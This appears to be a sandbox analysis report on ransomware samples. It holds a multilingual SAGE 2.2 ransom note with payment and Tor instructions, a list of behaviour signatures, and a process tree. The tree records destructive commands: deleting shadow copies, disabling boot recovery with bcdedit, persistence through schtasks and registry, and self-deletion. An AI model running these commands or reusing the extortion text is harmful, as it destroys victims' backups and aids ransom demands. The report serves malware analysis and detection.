iobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2> <h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2> <h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2> <h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2> <h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2> <h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2> <h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2> <h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2> <h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2> <h2 class='l l-zh' >文件已被加密,但是可以解密</h2> <p><span id='filename'></span></p> </div> </div> <h2>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2> <h2>Action required to restore your files.</h2> </div> <div class='container'> <div class="text l l-en" style='display:block'> <h1>File recovery instructions</h2> <p>You probably noticed that you can not open your files and that some software stopped working correctly.</p> <p>This is expected. Your files content is still there, but it was encrypted by <span class='us'>"SAGE 2.2 Ransomware"</span>.</p> <p>Your files are not lost, it is possible to revert them back to normal state by decrypting.</p> <p>The only way you can do that is by getting <span class='us'>"SAGE Decrypter"</span> software and your personal decryption key.</p> <div class='info'> <p>Using any other software which claims to be able to restore your files will result in files being damaged or destroyed.</p> </div> <p>You can purchase <span class='us'>"SAGE Decrypter"</span> software and your decryption key at your personal page you can access by following links:</p> <div class='keys'> <div class='key'> <a href="http://7gie6ffnkrjykggd.3io74zx.com/login/ARf-EFwuLjVz10UYdlvbiQvCXSv4N2l6IyodxWyW31g9_xQRuzqwRzzA" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.3io74zx.com/</a> </div> </div> <p>If you are asked for your personal key, copy it to the form on the site. This is your personal key:</p> <div class='keys'> <div class='key'> ARf-EFwuLjVz10UYdlvbiQvCXSv4N2l6IyodxWyW31g9_xQRuzqwRzzA </div> </div> <p>You will also be able to decrypt one file for free to make sure "SAGE Decrypter" software is able to recover your files</p> <div class='info'> <p>If none of those links work for you for a prolonged period of time or you need your files recovered as fast as possible, you can also access your personal page using "Tor Browser".</p> <p>In order to do that you need to:</p> <ol> <li>open Internet Explorer or any other internet browser;</li> <li>copy the address <a href='https://www.torproject.org/download/download-easy.html.en' onclick='javascript:return openlink(this.href)'>https://www.torproject.org/download/download-easy.html.en</a> into address bar and press "Enter";</li> <li>once the page opens, you will be offered to download Tor Browser, download it and run the installator, follow installation instructions;</li> <li>once installation is finished, open the newly installed Tor Browser and press the "Connect" button (button can be named differently if you installed non-English version);</li> <li>Tor Browser will establish connection and open a normal browser window;</li> <li>copy the address <div class='key'>http://7gie6ffnkrjykggd.onion/login/ARf-EFwuLjVz10UYdlvbiQvCXSv4N2l6IyodxWyW31g9_xQRuzqwRzzA</div> into this browser address bar and press "Enter";</li> <li>your personal page should be opened now; if it didn't then wait for a bit and try again.</li> </ol> <p>If you can not perform this steps then check your internet connection and try again. If it still doesn't work, try asking some computer guy for help in performing this steps for you or look for some video guides on <a href='https://www.youtube.com/results?search_query=tor+browser+install' onclick='javascript:return openlink(this.href)'>YouTube</a>.</p> </div> <div class='info'> <p>You can find a copy of this instruction in files named "!HELP_SOS" stored next to your encrypted files.</p> </div> </div> <div class="text l l-de" > <h1>Anleitung zur Dateiwiederherstellung</h2> <p>Sie haben sicherlich gemerkt, dass Sie Ihre Daten nicht öffnen können und dass Programme nicht mehr ordnungsgemäß funktionieren.</p> <p>Dies ist zu erwarten. Die Dateiinhalte existieren noch, aber wurden mit {us_enc}} verschlüsselt.</p> <p>Ihre Daten sind nicht verloren. Es ist möglich, sie mit Hilfe von Entschlüsselung in ihren Originalzustand zurückzuversetzen.</p> <p>Die einzige Möglichkeit das zu tun, ist die Verwendung von <span class='us'>"SAGE Decrypter"</span> Software und Ihr persönlicher Entschlüsselungskey.</p> <div class='info'> <p>Das Verwenden von anderer Software, die angeblich ihre Daten wiederherstellen kann, wird dazu führen, dass Ihre Daten beschädigt oder zerstört werden.</p> </div> <p>Sie können die <span class='us'>"SAGE Decrypter"</span> Software und Ihren Entschlüsselungskey auf Ihrer persönlichen Seite erwerben, indem Sie diesen Links folgen:</p> <div class='keys'> <div class='key'> <a href="http://7gie6ffnkrjykggd.3io74zx.com/login/ARf-EFwuLjVz10UYdlvbiQvCXSv4N2l6IyodxWyW31g9_xQRuzqwRzzA" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.3io74zx.com/</a> </div> </div> <p>Falls Sie nach ihrem persönlichen Key gefragt werden, kopieren Sie ihn in das Formular auf dieser Seite. Dies ist Ihr persönlicher Key:</p> <div class='keys'> <div class='key'> ARf-EFwuLjVz10UYdlvbiQvCXSv4N2l6IyodxWyW31g9_xQRuzqwRzzA </div> </div> <p>Sie können eine Datei gratis entschlüssen, um sicher zu sein, dass die "SAGE Decrypter" Software ihre Daten wiederherstellen kann</p> <div class='info'> <p>Falls keine dieser Links über einen längeren Zeitraum funktionieren sollten oder Sie Ihre Daten so schnell wie möglich wiederherstellen müssen, können Sie Ihre persönliche Seite mit Hilfe des "Tor Browser" aufrufen.</p> <p>Dazu benötigen Sie:</p> <ol> <li>Öffnen Sie den Internet Explorer oder einen anderen Internetbrowser;</li> <li>Kopieren Sie diese Adresse <a href='https://www.torproject.org/download/download-easy.html.en' onclick='javascript:return openlink(this.href)'>https://www.torproject.org/download/download-easy.html.en</a> in die Adressleiste und drücken Sie "Enter";</li> <li>So bald sich die Seite öffnet, wird Ihnen der Download des Tor Browser angeboten. Laden Sie ihn herunter und führen Sie die Installation aus, indem Sie den Installationsanweisungen folgen;</li> <li>Wenn die Installation abgeschlossen ist, öffnen Sie den soeben installierten Tor Browser und drücken Sie den "Connect" Knopf (Der Namen kann abweichen, falls Sie eine nicht-englische Version installiert haben);</li> <li>Tor Browser wird eine Verbindung herstellen und ein normales Browserfenster öffnen;</li> <li>Kopieren Sie die Adresse <div class='key'>http://7gie6ffnkrjykggd.onion/login/ARf-EFwuLjVz10UYdlvbiQvCXSv4N2l6IyodxWyW31g9_xQRuzqwRzzA</div> in die Browseradressleiste und drücken Sie "Enter";</li> <li>Ihre persönliche Seite sollte sich nun geöffnet haben; falls nicht: Warten Sie eine Weile und versuchen Sie es erneut.</li> </ol> <p>Falls Sie nicht in der Lage sind, diese Schritte durchzuführen, überprüfen Sie Ihre Internetverbindung. Wenn es noch immer nicht funktioniert, fragen Sie jemanden, der sich mit Computern auskennt, um diese Schritte durchzuführen oder schauen Sie sich einige Videoanleitungen auf {a_youtube}} an.</p> </div> <div class='info'> <p>Sie finden eine Kopie dieser Anleitung in einer Datei namens "!HELP_SOS" neben Ihren verschlüsselten Daten.</p> </div> </div> <div class="text l l-it" > <h1>Istruzioni per il recupero dei file</h2> <p>Probabilmente hai notato che non puoi più aprire i tuoi file e alcuni software hanno smesso di funzionare correttamente.</p> <p>Questo era previsto. I tuoi file si trovano ancora al loro posto, ma sono stati crittografati da <span class='us'>"SAGE 2.2 Ransomware"</span>.</p> <p>I tuoi file non sono persi, è possibile farli tornare al loro stato normale eseguendo una decrittazione.</p> <p>L'unico modo in cui è possibile farlo è scaricare il software <span class='us'>"SAGE Decrypter"</span> e la tua chiave personale di decrittazione.</p> <div class='info'> <p>Utilizzando un qualsiasi altro software che sostiene di essere in grado di ripristinare i tuoi file, li danneggerà o distruggerà per sempre.</p> </div> <p>È possibile acquistare il software <span class='us'>"SAGE Decrypter"</span> e la tua chiave di decrittazione nella tua pagina personale a cui puoi accedere d

Signatures

  • Kronos family
  • TeslaCrypt, AlphaCrypt

    Ransomware based on CryptoLocker. Shut down by the developers in 2016.

  • Teslacrypt family
  • Troldesh family
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • Contacts a large (8802) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 8 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 34 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 8 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 24 IoCs
  • UPX packed file 19 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 2 IoCs
  • Interacts with shadow copies 3 TTPs 13 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Modifies Control Panel 4 IoCs
  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 19 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k NetworkService
    1⤵
      PID:108
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00283.7z"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2060
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2572
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:772
      • C:\Users\Admin\Desktop\00283\HEUR-Trojan-Ransom.Win32.Bitman.gen-20b534a4a522b479a8a40cab0f341bcb15545aedbc1d9a9777f4fcdb5f5c002e.exe
        HEUR-Trojan-Ransom.Win32.Bitman.gen-20b534a4a522b479a8a40cab0f341bcb15545aedbc1d9a9777f4fcdb5f5c002e.exe
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:2864
        • C:\Users\Admin\Desktop\00283\HEUR-Trojan-Ransom.Win32.Bitman.gen-20b534a4a522b479a8a40cab0f341bcb15545aedbc1d9a9777f4fcdb5f5c002e.exe
          HEUR-Trojan-Ransom.Win32.Bitman.gen-20b534a4a522b479a8a40cab0f341bcb15545aedbc1d9a9777f4fcdb5f5c002e.exe
          3⤵
            PID:1000
            • C:\Windows\ifpwmplkufqk.exe
              C:\Windows\ifpwmplkufqk.exe
              4⤵
                PID:1696
                • C:\Windows\ifpwmplkufqk.exe
                  C:\Windows\ifpwmplkufqk.exe
                  5⤵
                    PID:2176
                    • C:\Windows\System32\wbem\WMIC.exe
                      "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                      6⤵
                        PID:2728
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00283\HEUR-T~1.EXE
                    4⤵
                      PID:2756
                      • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                        "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                        5⤵
                          PID:2240
                          • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                            "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                            6⤵
                              PID:2488
                    • C:\Users\Admin\Desktop\00283\HEUR-Trojan-Ransom.Win32.Zerber.gen-fe60eeda829aeff61a53ed1f67af56e46bb7c430cad6af87365905e6a893a8e6.exe
                      HEUR-Trojan-Ransom.Win32.Zerber.gen-fe60eeda829aeff61a53ed1f67af56e46bb7c430cad6af87365905e6a893a8e6.exe
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious behavior: MapViewOfSection
                      PID:2860
                      • C:\Users\Admin\Desktop\00283\HEUR-Trojan-Ransom.Win32.Zerber.gen-fe60eeda829aeff61a53ed1f67af56e46bb7c430cad6af87365905e6a893a8e6.exe
                        HEUR-Trojan-Ransom.Win32.Zerber.gen-fe60eeda829aeff61a53ed1f67af56e46bb7c430cad6af87365905e6a893a8e6.exe
                        3⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3008
                    • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Bitman.jki-44efa26fdd2392445598aed7114f575ce4280af5859b1a94488bca21137f00d7.exe
                      Trojan-Ransom.Win32.Bitman.jki-44efa26fdd2392445598aed7114f575ce4280af5859b1a94488bca21137f00d7.exe
                      2⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious use of SetWindowsHookEx
                      PID:2824
                      • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Bitman.jki-44efa26fdd2392445598aed7114f575ce4280af5859b1a94488bca21137f00d7.exe
                        Trojan-Ransom.Win32.Bitman.jki-44efa26fdd2392445598aed7114f575ce4280af5859b1a94488bca21137f00d7.exe
                        3⤵
                          PID:2344
                          • C:\Windows\xvkevbukowlv.exe
                            C:\Windows\xvkevbukowlv.exe
                            4⤵
                              PID:1956
                              • C:\Windows\xvkevbukowlv.exe
                                C:\Windows\xvkevbukowlv.exe
                                5⤵
                                  PID:2040
                                  • C:\Windows\System32\wbem\WMIC.exe
                                    "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                    6⤵
                                      PID:2728
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00283\TROJAN~1.EXE
                                  4⤵
                                    PID:2480
                                    • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                      "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                      5⤵
                                        PID:1680
                                        • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                          "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                          6⤵
                                            PID:1284
                                  • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Bitman.qjw-1ea238583665aa02e0b945dbd60d30c2aafe56a626f68d0b5a49a45d0a033d99.exe
                                    Trojan-Ransom.Win32.Bitman.qjw-1ea238583665aa02e0b945dbd60d30c2aafe56a626f68d0b5a49a45d0a033d99.exe
                                    2⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:1980
                                    • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Bitman.qjw-1ea238583665aa02e0b945dbd60d30c2aafe56a626f68d0b5a49a45d0a033d99.exe
                                      Trojan-Ransom.Win32.Bitman.qjw-1ea238583665aa02e0b945dbd60d30c2aafe56a626f68d0b5a49a45d0a033d99.exe
                                      3⤵
                                        PID:2288
                                        • C:\Windows\xtlysiqxdifi.exe
                                          C:\Windows\xtlysiqxdifi.exe
                                          4⤵
                                            PID:1632
                                            • C:\Windows\xtlysiqxdifi.exe
                                              C:\Windows\xtlysiqxdifi.exe
                                              5⤵
                                                PID:1672
                                                • C:\Windows\System32\wbem\WMIC.exe
                                                  "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                                                  6⤵
                                                    PID:2244
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00283\TROJAN~2.EXE
                                                4⤵
                                                  PID:2416
                                                  • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                                    "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                                    5⤵
                                                      PID:1652
                                                      • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                                        "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                                        6⤵
                                                          PID:316
                                                          • C:\Windows\system32\vssadmin.exe
                                                            "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                                                            7⤵
                                                            • Interacts with shadow copies
                                                            PID:1260
                                                          • C:\Windows\system32\wbem\wmic.exe
                                                            "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
                                                            7⤵
                                                              PID:2788
                                                            • C:\Windows\System32\bcdedit.exe
                                                              "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
                                                              7⤵
                                                              • Modifies boot configuration data using bcdedit
                                                              PID:2360
                                                            • C:\Windows\System32\bcdedit.exe
                                                              "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
                                                              7⤵
                                                              • Modifies boot configuration data using bcdedit
                                                              PID:2584
                                                  • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Blocker.jpxu-be0f5ad604ece33cbd18bb2653717b2f874f09dc985f9ae83431b8dfdd8ad7e7.exe
                                                    Trojan-Ransom.Win32.Blocker.jpxu-be0f5ad604ece33cbd18bb2653717b2f874f09dc985f9ae83431b8dfdd8ad7e7.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:264
                                                    • C:\Windows\system32\wscript.exe
                                                      "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\761A.tmp\761B.vbs
                                                      3⤵
                                                        PID:1868
                                                    • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Blocker.jxpk-5b1689a2e699f40681e766a6a3c39584121c6f6883d2d58993fd03a996ace7dd.exe
                                                      Trojan-Ransom.Win32.Blocker.jxpk-5b1689a2e699f40681e766a6a3c39584121c6f6883d2d58993fd03a996ace7dd.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Adds Run key to start application
                                                      • Suspicious use of SetThreadContext
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                      PID:2744
                                                      • C:\Windows\SysWOW64\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Octopuscpy.vbs"
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1096
                                                      • C:\Users\Admin\AppData\Local\Temp\illumis.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\illumis.exe"
                                                        3⤵
                                                          PID:1856
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /tn "Ose" /tr "'C:\Program Files (x86)\Windows\win.exe' /startup" /sc MINUTE /f /rl highest
                                                            4⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:2300
                                                          • C:\Windows\SysWOW64\REG.exe
                                                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "Ose" /d "cmd /c """start """Ose""" """C:\Program Files (x86)\Windows\win.exe"""" /f /reg:64
                                                            4⤵
                                                              PID:1176
                                                        • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Blocker.jxru-651b93f737c56d3d31679ef7c03ee81cf1e5566c9dd13e8ec2909f390bf607c4.exe
                                                          Trojan-Ransom.Win32.Blocker.jxru-651b93f737c56d3d31679ef7c03ee81cf1e5566c9dd13e8ec2909f390bf607c4.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of SetThreadContext
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:532
                                                          • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Blocker.jxru-651b93f737c56d3d31679ef7c03ee81cf1e5566c9dd13e8ec2909f390bf607c4.exe
                                                            Trojan-Ransom.Win32.Blocker.jxru-651b93f737c56d3d31679ef7c03ee81cf1e5566c9dd13e8ec2909f390bf607c4.exe
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:2436
                                                            • C:\Windows\SysWOW64\svchost.exe
                                                              "C:\Windows\system32\svchost.exe"
                                                              4⤵
                                                              • Adds Run key to start application
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious behavior: MapViewOfSection
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3056
                                                        • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Foreign.nilv-89866b2ccd976601b0d2a8776c958dbcfd66d11a8dbde2d4aba21eab6a93594d.exe
                                                          Trojan-Ransom.Win32.Foreign.nilv-89866b2ccd976601b0d2a8776c958dbcfd66d11a8dbde2d4aba21eab6a93594d.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1772
                                                          • C:\Windows\syswow64\svchost.exe
                                                            C:\Windows\syswow64\svchost.exe
                                                            3⤵
                                                              PID:2148
                                                          • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Foreign.nkks-63c30501bbe452da2235d774b1acbc6c7d5e53592d6efd094c5f1fb51b659189.exe
                                                            Trojan-Ransom.Win32.Foreign.nkks-63c30501bbe452da2235d774b1acbc6c7d5e53592d6efd094c5f1fb51b659189.exe
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1436
                                                            • C:\Users\Admin\Desktop\00283\Trojan-Ransom.Win32.Foreign.nkks-63c30501bbe452da2235d774b1acbc6c7d5e53592d6efd094c5f1fb51b659189.exe
                                                              Trojan-Ransom.Win32.Foreign.nkks-63c30501bbe452da2235d774b1acbc6c7d5e53592d6efd094c5f1fb51b659189.exe
                                                              3⤵
                                                                PID:1220
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\B6B2\5B59.bat" "C:\Users\Admin\AppData\Roaming\MICROS~1\BitsPQEC\enersnap.exe" "C:\Users\Admin\Desktop\00283\TR72DC~1.EXE""
                                                                  4⤵
                                                                    PID:2608
                                                                    • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                                                      "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                                                      5⤵
                                                                        PID:612
                                                                        • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                                                          "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                                                          6⤵
                                                                            PID:1952
                                                                            • C:\Windows\system32\vssadmin.exe
                                                                              "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                                                                              7⤵
                                                                              • Interacts with shadow copies
                                                                              PID:212
                                                                            • C:\Windows\system32\wbem\wmic.exe
                                                                              "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
                                                                              7⤵
                                                                                PID:1740
                                                                              • C:\Windows\System32\bcdedit.exe
                                                                                "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
                                                                                7⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:1512
                                                                              • C:\Windows\System32\bcdedit.exe
                                                                                "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
                                                                                7⤵
                                                                                • Modifies boot configuration data using bcdedit
                                                                                PID:1724
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /C ""C:\Users\Admin\AppData\Roaming\MICROS~1\BitsPQEC\enersnap.exe" "C:\Users\Admin\Desktop\00283\TR72DC~1.EXE""
                                                                            5⤵
                                                                              PID:384
                                                                              • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                                                                "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                                                                6⤵
                                                                                  PID:2044
                                                                                  • C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\{4B515B6F-3A9B-7D24-0D07-0BB700B153B4}\netbtugc.exe"
                                                                                    7⤵
                                                                                      PID:300
                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                        "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                                                                                        8⤵
                                                                                        • Interacts with shadow copies
                                                                                        PID:2248
                                                                                      • C:\Windows\system32\wbem\wmic.exe
                                                                                        "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
                                                                                        8⤵
                                                                                          PID:444
                                                                                        • C:\Windows\System32\bcdedit.exe
                                                                                          "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
                                                                                          8⤵
                                                                                          • Modifies boot configuration data using bcdedit
                                                                                          PID:2580
                                                                                        • C:\Windows\System32\bcdedit.exe
                                                                                          "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
                                                                                          8⤵
                                                                                          • Modifies boot configuration data using bcdedit
                                                                                          PID:2000
                                                                                    • C:\Users\Admin\AppData\Roaming\MICROS~1\BitsPQEC\enersnap.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\MICROS~1\BitsPQEC\enersnap.exe" "C:\Users\Admin\Desktop\00283\TR72DC~1.EXE"
                                                                                      6⤵
                                                                                        PID:988
                                                                                        • C:\Users\Admin\AppData\Roaming\MICROS~1\BitsPQEC\enersnap.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\MICROS~1\BitsPQEC\enersnap.exe" "C:\Users\Admin\Desktop\00283\TR72DC~1.EXE"
                                                                                          7⤵
                                                                                            PID:3996
                                                                                            • C:\Windows\system32\svchost.exe
